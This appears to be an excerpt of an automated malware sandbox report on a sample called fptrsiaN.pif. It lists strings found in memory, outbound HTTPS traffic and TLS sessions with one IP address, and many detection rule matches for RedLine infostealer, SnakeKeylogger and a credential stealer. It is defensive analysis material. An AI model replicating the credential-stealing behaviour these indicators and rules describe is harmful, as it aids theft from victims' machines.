          Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.000000003115D000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311A2000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311AC000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.1894
          Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E47D000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E42F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E4A4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E6C5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E585000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E2CC000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022DBC000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F1F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F94000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000231B5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023075000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F6D000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032515000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.000000003227F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000323D5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000322CD000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.000000003211C000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000322F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
          Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E47F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E67E000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E560000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E2A7000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E40A000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E435000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.000000002316D000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F25000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F6F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023050000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022EFA000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022D97000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000322CF000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000324CE000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.000000003225A000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000320F7000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000323B0000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032285000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
          Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E47D000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E42F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E4A4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E6C5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E585000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E2CC000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022DBC000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F1F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F94000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000231B5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023075000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F6D000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032515000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.000000003227F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000323D5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000322CD000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.000000003211C000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000322F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
          Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E47F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E67E000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E560000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E2A7000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E40A000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E435000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.000000002316D000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F25000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022F6F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023050000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022EFA000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000022D97000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000322CF000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000324CE000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.000000003225A000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000320F7000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.00000000323B0000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032285000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
          Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312FB000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D482000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/Lz
          Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D473000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/hy
          Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D47D000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F5A000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/p
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49784 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49792 version: TLS 1.2

          System Summary

          barindex
          Source: 6.2.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 10.2.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 15.1.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 15.2.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 1.2.x.exe.213963a8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 15.2.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 6.1.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 1.2.x.exe.213d31d8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.Naisrtpf.PIF.210cab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 15.1.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 9.2.Naisrtpf.PIF.210cab18.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 6.2.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 1.2.x.exe.213963a8.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 6.1.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 10.1.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 10.2.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.Naisrtpf.PIF.21107948.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
